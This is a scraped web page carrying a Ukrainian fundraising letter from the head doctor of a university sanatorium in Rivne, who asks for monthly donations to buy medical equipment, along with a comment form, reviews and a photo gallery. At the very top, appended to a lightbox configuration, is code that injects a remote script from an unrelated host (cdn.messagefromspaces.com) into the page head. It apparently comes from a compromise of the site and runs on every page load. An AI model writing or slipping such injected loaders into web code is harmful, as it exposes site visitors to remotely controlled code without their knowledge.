, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Требуется помощь санаторию-профилакторию

ВІДОКРЕМЛЕНИЙ СТРУКТУРНИЙ ПІДРОЗДІЛ – САНАТОРІЙ-ПРОФІЛАКТОРІЙ
РІВНЕНСЬКОГО ДЕРЖАВНОГО ГУМАНІТАРНОГО УНІВЕРСИТЕТУ
вул. Остафова, 41, м. Рівне, 33028;
телефон (0362)264846;
розрахунковийрахунок № 26009010104121 в ПАТ „Укрсоцбанк” м. Київ, МФО 300023
Ідентифікаційний код за ЄДРПОУ 34327790

№ __________
На від _____

Шановна Світлано Володимирівно!

Наш заклад розрахований на 50 ліжок. Висококваліфікований склад медичних працівників у кількості 18 осіб з високою культурою проводить діагностику, лікування та оздоровлення та реабілітації потребуючих. Для зручності та ефективності пацієнти проживають та харчуються безпосередньо на даній базі, що потребує додаткових витрат з нашого боку.
Санаторій – профілакторій займається оздоровленням пацієнтів.
У нас є достатній перелік необхідних процедур:
огляд лікарем терапевтом, ультразвукові інгаляції, медикаментозний електрофорез, дарсонвалізація місцева, УВЧ – терапія, ультрафіолетове опромінювання, ультразвукова терапія, магнітотерапія, тубус – кварц, ампліпульс, аплікація парафінова, електросон, масаж, підводний душ–масаж, душ Шарко, циркулярний душ, хвойні ванни, стоматологічні послуги, реабілітаційні та маніпуляційні послуги.
Держава призупинила фінансування санаторіїв-профілакторіїв при навчальних закладах України з 01.01.2015 року, але задля збереження бази і заради великої кількості потребуючих в покращенні здоров’я, я, головний лікар, разом зі своїм колективом шукаємо шляхи подолання у вирішенні надзвичайно складної ситуації та підтримку небайдужих людей.
Є потреба, є бажання. Але життя не стоїть на місці, а вимагає модернізації.
Нажаль, власними силами ми не в змозі це забезпечити, тому віримо у Вас та надіємось на Вашу допомогу та підтримку. Переконливо просимо Вас щомісячно надавати допомогу у виді виділення певної суми коштів. Кошти будуть направлені на придбання сучасної новітньої медичної апаратури та забезпечення лікувального процесу в цілому. Ваш крок назустріч допоможе нам разом з Вами відновлювати та підтримувати здорову націю. Тому у мене є бажання заключити договір про співпрацю та допомогу з Вами.
Ми заздалегідь дякуємо за Вашу доброту!

За дорученням колективу,
З Повагою,

головний лікар санаторію-профілакторію при РДГУ
Монастирський Михайло Броніславович
м.т.: (067) 7332706

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ

Санаторий Новостав г. Ровно 20 июля 2013 г.Санаторий Новостав г. Ровно 20 июля 2013 г.Санаторий Новостав г. Ровно 20 июля 2013 г.
2007_05.jpgСанаторий Новостав г. Ровно 20 июля 2013 г.Санаторий Новостав г. Ровно 20 июля 2013 г.
Санаторий Новостав г. Ровно 20 июля 2013 г.Санаторий Новостав г. Ровно 20 июля 2013 г.2007_03.jpg

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2